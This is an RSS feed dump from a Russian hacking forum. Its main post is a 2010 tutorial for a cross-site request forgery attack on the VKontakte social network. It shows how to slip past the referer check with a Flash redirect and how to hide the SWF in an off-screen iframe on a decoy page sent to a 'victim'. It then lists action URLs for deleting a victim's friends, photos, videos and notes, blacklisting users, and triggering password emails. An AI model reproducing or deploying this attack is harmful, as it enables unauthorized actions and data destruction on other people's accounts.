http://xackerok.forumbb.ru/ Хакерский форум ru-ru Sat, 16 Oct 2010 21:35:48 +0400 MyBB/mybb.ru http://xackerok.forumbb.ru/viewtopic.php?pid=2#p2 <p>Уязвимость позволяет производить некоторые действия вконтакте от чужого имени. <br />В дальнейшем человека, от лица которого мы будем совершать эти действия, буду называть &quot;жертва&quot;.</p> <p>Теория</p> <p>Суть уязвимости:</p> <p>1. Сайт вконтакте.ру устроен таким образом, что если закрыть страницу сайта, а потом снова ее открыть, страница откроется, не запросив пароль.<br />2. Сайту, как я понял, все равно каким методом мы посылаем данные из формы - GET или POST - он их обрабатывает одинакого.</p> <p>Мы можем воспользоваться этим.</p> <p>Сформировав определенный URL в адресной строке браузера, мы можем производить некоторые действия. <br />Но, сайт не так просто сделан.</p> <p>1. В некоторых формах есть скрытые поля с секретным кодом. Не зная этот код, мы ничего не сможем сделать. Но узнать его не просто, поэтому такие формы я не буду затрагивать в статье. <br />2. Сайт проверяет значение $_SERVER['HTTP_REFERER'], но мы обойдем эту проверку с помощью Flash. </p> <p>Для того, чтобы все отработало успешно, нужно: <br />1. Чтобы у жертвы в браузере был включен Flash. (У большинства людей, сидящих в этой социальной сети, он включен, т.к. без него не работают многие сервисы контакта: музыка, видео, приложения и т.д.) <br />2. Чтобы жертва была залогинена вконтакте. (Большинство людей не нажимают кнопку &quot;Выход&quot; вконтакте, даже когда выходят из-за компа, поэтому с этим условием, думаю, проблем тоже не возникнет.)</p> <p>Для примера, попробуйте ввести в адресной строке браузера в новом окне следующий URL: <a href="http://vkontakte.ru/groups.php?act=enter&amp;gid=777107" rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=enter&amp;gid=777107</a><br />Вы автоматически вступили в группу &quot;В Контакте | Безопасность&quot;. <br />Теперь выйдите из группы и попробуйте перейти по точно такой же ссылке: <a href="http://vkontakte.ru/groups.php?act=enter&amp;gid=777107" rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=enter&amp;gid=777107</a> (откроется в новом окне)<br />Теперь вступить в группу вам не удалось, а все по одной причине: переходя по ссылке с любого сайта, в контакт передается значение предыдущей страницы, и, в целях безопасности, он блокирует такие действия. Мы же, чуть позже, обойдем эту защиту. </p> <p>Приведу еще пример - откройте в новом окне следующую страницу: <a href="http://vkontakte.ru/settings.php?act=addToBlackList&amp;id=1" rel="nofollow" target="_blank">http://vkontakte.ru/settings.php?act=ad &#8230; t&amp;id=1</a><br />Вот и создатель этого сайта оказался у вас в игноре. <br />Подобным образом можно совершать разные действия (их список в конце статьи) </p> <p>Понятно, что если вы кинете жертве подобную ссылку, жертва поймет, в чем подвох.<br />Мы же попытаемся открыть эту страницу незаметно для жертвы. </p> <p>Но, прежде, чем использовать эту уязвимость на жертве, мы потренеруемся на себе. <br />В примере мы создадим скрипт, добавляющий людей в ту же группу -&quot;В Контакте | Безопасность&quot;. <br />От вас требуются элементарные знания HTML. </p> <p>Выглядеть будет это так: <br />Мы кидаем жертве ссылку на наш сайт. <br />Жертва открывает эту ссылку. <br />На сайте находится скрытый фрэйм. <br />Этот фрэйм ссылается на специальный Flash-скрипт, который перенаправляет нас на все тот же адрес: <a href="http://vkontakte.ru/groups.php?act=enter&amp;gid=777107." rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=ente &#8230; id=777107.</a> <br />Т.к. идет перенаправление через флэш, то адрес предыдущей страницы не передастся, а значит контакт выполнит наше действие. <br />Когда в скрытом фрэйме откроется эта страница, жертва незаметно добавится в группу &quot;В Контакте | Безопасность&quot;. </p> <p>Приступим? </p> <p>Практика.</p> <p>Шаг 1. Создаем флэшку.<br />Для начала, создадим эту флэшку. <br />Для ее быстрого создания я написал специальный скрипт: <a href="http://swfgen.m0nster.tu2.ru" rel="nofollow" target="_blank">http://swfgen.m0nster.tu2.ru</a><br />Скрипт запросит у вас URL. Вводите туда <a href="http://vkontakte.ru/groups.php?act=enter&amp;gid=777107" rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=enter&amp;gid=777107</a> и жмите &quot;ОК&quot;. <br />Скрипт вернет вам ссылку на готовую флэшку. <br />Качаем флэшку на комп и переименовываем в более читаемый вид. Пусть будет vkontakte.swf</p> <p>Шаг 2. Создаем HTML страничку.<br />Теперь создаем HTML-страничку. Пусть она будет называться просто index.html. <br />Пишем там любую чушь, главное, чтоб не вызвать подозрения у жертвы, что тут что-то неладное. <br />Что написать на странице - дело ваше. <br />После этого вставляем куда-нибудь в тело странички скрытый &lt;IFRAME&gt;. </p> <p>&lt;iframe src=&quot;vkontakte.swf&quot; style=&quot;width:10px; height:10px; padding:0; margin:0; position:absolute; left:-100; top:-100;&quot;&gt;&lt;/iframe&gt;</p> <p>(На этом этапе может возникнуть вопрос, почему не сделать просто display:hidden, например. А потому, что в таком случае флэш не отработает) </p> <p>Шаг 3.<br />Теперь у нас есть два файла: vkontakte.swf и index.html<br />Регистрируем какой-нибудь сайт на бесплатном хостинге. <br />Нам даже поддержка PHP не нужна, поэтому почти любой хостинг нам подойдет. <br />Загружаем на свеженький сайт наши файлы. <br />И попробуем открыть страничку index.html. <br />Открывается страничка, ничего странного вроде не наблюдается... <br />Теперь открываем нашу страницу Вконтакте и смотрим список групп - если там появилась группа &quot;В Контакте | Безопасность&quot;, значит, все отработало успешно. <br />Можно выйти из этой группы и снова открыть нашу страницу index.html, чтобы точно удостовериться, что все работает. </p> <p>Все, мы научились делать это. <br />Теперь попробуем что-нибудь посложнее. <br />Давайте удалим какую-нибудь фотку у друга. <br />Для этого нужно знать ID фото. <br />Узнать его не сложно: открываем страницу просмотра нужной(а точнее ненужной) фотографии и смотрим адрес страницы. <br />Там что-то типа такого: <a href="http://vkontakte.ru/photos.php?act=show&amp;id=1234567_987654321." rel="nofollow" target="_blank">http://vkontakte.ru/photos.php?act=show &#8230; 987654321.</a> <br />В этом случае ID фото будет 1234567_987654321. Вы же делаете по аналогии. <br />Когда узнали идентификатор фотографии, идем к уже знакомому скрипту, который сгенерирует нам флэшку. <br />Пишем в поле URL следующий код: <a href="http://vkontakte.ru/photos.php?act=do_fdelete&amp;id=ИД_ФОТО" rel="nofollow" target="_blank">http://vkontakte.ru/photos.php?act=do_f &#8230; id=ИД_ФОТО</a><br />Дальше все уже знакомо: переименовываем флэшку, создаем HTML страничку, там &lt;IFRAME&gt;, ссылающийся на нашу флэшку. <br />Теперь кидаем ссылку на нашу страничку другу, и, если друг нажмет на ссылку, то фока у него должна исчезнуть. </p> <p>Думаю, принцип вы поняли. <br />Теперь приведу список возможных действий, и требующийся для них URL. </p> <p><a href="http://vkontakte.ru/settings.php?act=addToBlackList&amp;id=ИД" rel="nofollow" target="_blank">http://vkontakte.ru/settings.php?act=ad &#8230; &amp;id=ИД</a> <br />Добавить человека в черный список</p> <p><a href="http://vkontakte.ru/friend.php?act=do_delete&amp;id=ИД" rel="nofollow" target="_blank">http://vkontakte.ru/friend.php?act=do_delete&amp;id=ИД</a> <br />Удалить друга</p> <p><a href="http://vkontakte.ru/groups.php?act=enter&amp;gid=ИД_ГРУППЫ" rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=ente &#8230; =ИД_ГРУППЫ</a> <br />Вступить в группу</p> <p><a href="http://vkontakte.ru/groups.php?act=leave&amp;gid=ИД_ГРУППЫ" rel="nofollow" target="_blank">http://vkontakte.ru/groups.php?act=leav &#8230; =ИД_ГРУППЫ</a> <br />Покинуть группу </p> <p><a href="http://vkontakte.ru/notes.php?act=do_delete&amp;nid=ИД_ЗАМЕТКИ" rel="nofollow" target="_blank">http://vkontakte.ru/notes.php?act=do_de &#8230; ИД_ЗАМЕТКИ</a> <br />Удалить заметку</p> <p>Редактировать заметку<br />ИД заметки можно узнать из url при просмотре заметки. <br />visible - кто может просматривать заметку. commentable - кто может комментировать <br />могут принимать следующие значения: <br />0 - все <br />1 - Друзья и друзья друзей <br />2 - Только друзья </p> <p><a href="http://vkontakte.ru/video.php?act=do_delete&amp;oid=ИД&amp;id=ИД_ВИДЕО" rel="nofollow" target="_blank">http://vkontakte.ru/video.php?act=do_de &#8230; d=ИД_ВИДЕО</a> <br />Удалить видео<br />(ИД_ВИДЕО можно узнать из url при просмотре видео) </p> <p><a href="http://vkontakte.ru/photos.php?act=do_fdelete&amp;id=ИД_ФОТО" rel="nofollow" target="_blank">http://vkontakte.ru/photos.php?act=do_f &#8230; id=ИД_ФОТО</a> <br />Удалить фото<br />(узнать ид фото можно из url при просмотре фото.) </p> <p><a href="http://vkontakte.ru/settings.php?act=send" rel="nofollow" target="_blank">http://vkontakte.ru/settings.php?act=send</a> <br />Выслать на почту жертвы письмо с её паролем</p> <p>Источник:http://xackerok.forumbb.ru</p> mybb@mybb.ru (hacksonik) Sat, 16 Oct 2010 21:35:48 +0400 http://xackerok.forumbb.ru/viewtopic.php?pid=2#p2 http://xackerok.forumbb.ru/viewtopic.php?pid=1#p1 <p>Благодарим за выбор нашего сервиса!</p> mybb@mybb.ru (hacksonik) Sat, 16 Oct 2010 20:07:13 +0400 http://xackerok.forumbb.ru/viewtopic.php?pid=1#p1